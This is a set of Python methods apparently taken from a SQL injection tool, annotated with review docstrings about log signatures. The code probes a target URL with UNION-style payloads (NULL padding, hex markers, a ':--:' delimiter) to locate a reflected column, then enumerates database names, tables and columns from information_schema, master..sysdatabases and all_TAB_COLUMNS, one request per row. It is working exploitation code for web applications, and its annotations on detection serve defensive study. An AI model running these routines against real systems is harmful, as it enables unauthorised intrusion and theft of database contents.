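def set_actual_boundary(self):
    """Probe for a reflected column and store the boundary template.

    Two probing phases run with ``information_schema.schemata`` as the
    table name and ``SQL.query`` as the active query:

    1. Up to 25 calls, each with one more column than the last (``NULL``
       padding followed by the marker ``10000``), stopping at the first
       response whose text contains the marker.
    2. Three calls with a fixed three-entry column list, placing the
       value of ``format_hex(random_str())`` in each position in turn.
       At the first position where ``un_hex(token)`` appears in the
       response text, the marker inside the payload is replaced by
       ``concat(0x3a2d2d3a,%query,0x3a2d2d3a)`` and the result is kept
       as the boundary template.

    The template is stored in ``self.ini_boundary`` and handed to
    ``self.set_boundary``. When no position reflects the marker, the
    error is logged and the process exits with a non-zero status.

    Review note for log analysis: 0x3a2d2d3a is the byte sequence
    ``:--:``. Presumably the column lists built here travel inside the
    payload (``get_payload`` is not visible), in which case the NULL
    runs and this delimiter are stable strings to match on in request
    logs.
    """
    table_name = "information_schema.schemata"
    self.set_query(SQL.query)

    # Phase 1: grow the column list one entry at a time.
    # NOTE(review): the index at which this loop stops is never used
    # afterwards; phase 2 always works with three columns.
    token = '10000'
    for i in range(25):
        col_name = [','.join(["NULL"] * i + [token])]
        payload, _ = self.get_payload(table_name, col_name)
        res = req.connection(conf.url, payload)
        if token in res.text:
            break

    # Phase 2: find which of three positions is echoed in the response.
    token = format_hex(random_str())
    for i in range(3):
        pack = ["NULL"] * 3
        pack[i] = token
        col_name = [','.join(pack)]
        payload, _ = self.get_payload(table_name, col_name)
        res = req.connection(conf.url, payload)
        if un_hex(token) in res.text:
            boundary = payload.replace(
                token, "concat(0x3a2d2d3a,%query,0x3a2d2d3a)")
            self.ini_boundary = boundary
            self.set_boundary(boundary)
            break
    else:
        logger.error("Set Boundary Error!!!")
        # A failed setup must not report success to the calling shell
        # or wrapper script, so exit with a non-zero status.
        sys.exit(1)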
def get_dbs(self):
    """Return the list of names read from ``master..sysdatabases``.

    The row count comes from ``self.get_counts`` while ``SQL.query`` is
    the active query; the query is then reset and each row is read with
    its own payload, using 1-based positions ``1 .. counts``.

    Review note for log analysis: the loop makes one ``req.connection``
    call per row against the same ``conf.url``, so a run shows up as a
    burst of sequential, near-identical requests.
    """
    source_table = 'master..sysdatabases'
    wanted = ["name"]

    self.set_query(SQL.query)
    counts = self.get_counts(source_table, wanted)
    logger.info("all dbs counts is :%s" % counts)
    self.reset_query()

    names = []
    for position in range(1, int(counts) + 1):
        payload, token = self.get_payload(source_table, wanted, str(position))
        response = req.connection(conf.url, payload=payload)
        # The token returned with the payload is what locates the value
        # inside the response text.
        name = self.get_value_from_response(response.text, token)
        names.append(name)
        logger.info("Ent:" + name)
    return names
def get_columns(self, db, table):
    """Return the column names of ``table`` in ``db``.

    ``SQL.query_col`` is filled in by replacing ``{db}`` and ``{table}``
    with ``format_hex(db)`` and ``format_hex(table)``. The row count is
    read from ``information_schema.columns`` and rows are then fetched
    one by one with 0-based offsets ``0 .. counts - 1``.

    Review note for log analysis: each row costs one
    ``req.connection`` call to ``conf.url``.
    """
    source_table = 'information_schema.columns'
    wanted = ["column_name"]

    with_db = SQL.query_col.replace("{db}", format_hex(db))
    self.set_query(with_db.replace("{table}", format_hex(table)))

    counts = self.get_counts(source_table, wanted)
    found = []
    for offset in range(int(counts)):
        payload, token = self.get_payload(source_table, wanted, str(offset))
        response = req.connection(conf.url, payload=payload)
        column = self.get_value_from_response(response.text, token)
        found.append(column)
        logger.info("Ent:" + column)
    return found
def get_tables(self, db):
    """Return the table names found for ``db``.

    ``SQL.query_tab`` is filled in by replacing ``{db}`` with
    ``format_hex(db)``. The row count is read from
    ``information_schema.tables`` and rows are then fetched one by one
    with 0-based offsets ``0 .. counts - 1``.

    Review note for log analysis: each row costs one
    ``req.connection`` call to ``conf.url``.
    """
    source_table = 'information_schema.tables'
    wanted = ["table_name"]

    self.set_query(SQL.query_tab.replace("{db}", format_hex(db)))
    counts = self.get_counts(source_table, wanted)
    # NOTE(review): the message says "dbs" although this value is the
    # number of tables; the text is kept as it was.
    logger.info("all dbs counts is :%s" % counts)

    found = []
    for offset in range(int(counts)):
        payload, token = self.get_payload(source_table, wanted, str(offset))
        response = req.connection(conf.url, payload=payload)
        name = self.get_value_from_response(response.text, token)
        found.append(name)
        logger.info("Ent:" + name)
    return found
def get_columns(self, db, table):
    """Return the column names of ``table`` in ``db`` via ``all_TAB_COLUMNS``.

    Two query templates are used in turn: ``SQL.query_all_col`` is
    active while the row count is read, then ``SQL.query_col`` is active
    while the rows are fetched with 1-based positions ``1 .. counts``.

    In both templates ``{db}`` and ``{table}`` become single-quoted
    values filled in with ``str.format``.
    NOTE(review): ``db`` and ``table`` are placed between the quotes
    verbatim, and ``str.format`` runs over the whole template, so a
    name containing a quote or a brace changes the resulting query
    text or raises.

    Review note for log analysis: each row costs one
    ``req.connection`` call to ``conf.url``.
    """
    source_table = 'all_TAB_COLUMNS'
    wanted = ["column_name"]

    def fill(template):
        # Turn the {db}/{table} markers into quoted positional fields,
        # then substitute the two names.
        quoted = template.replace("{db}", "'{0}'").replace(
            "{table}", "'{1}'")
        return quoted.format(db, table)

    self.set_query(fill(SQL.query_all_col))
    counts = self.get_counts(source_table, wanted)

    self.set_query(fill(SQL.query_col))
    found = []
    for position in range(1, int(counts) + 1):
        payload, token = self.get_payload(source_table, wanted, str(position))
        response = req.connection(conf.url, payload=payload)
        column = self.get_value_from_response(response.text, token)
        found.append(column)
        logger.info("Ent:" + column)
    return found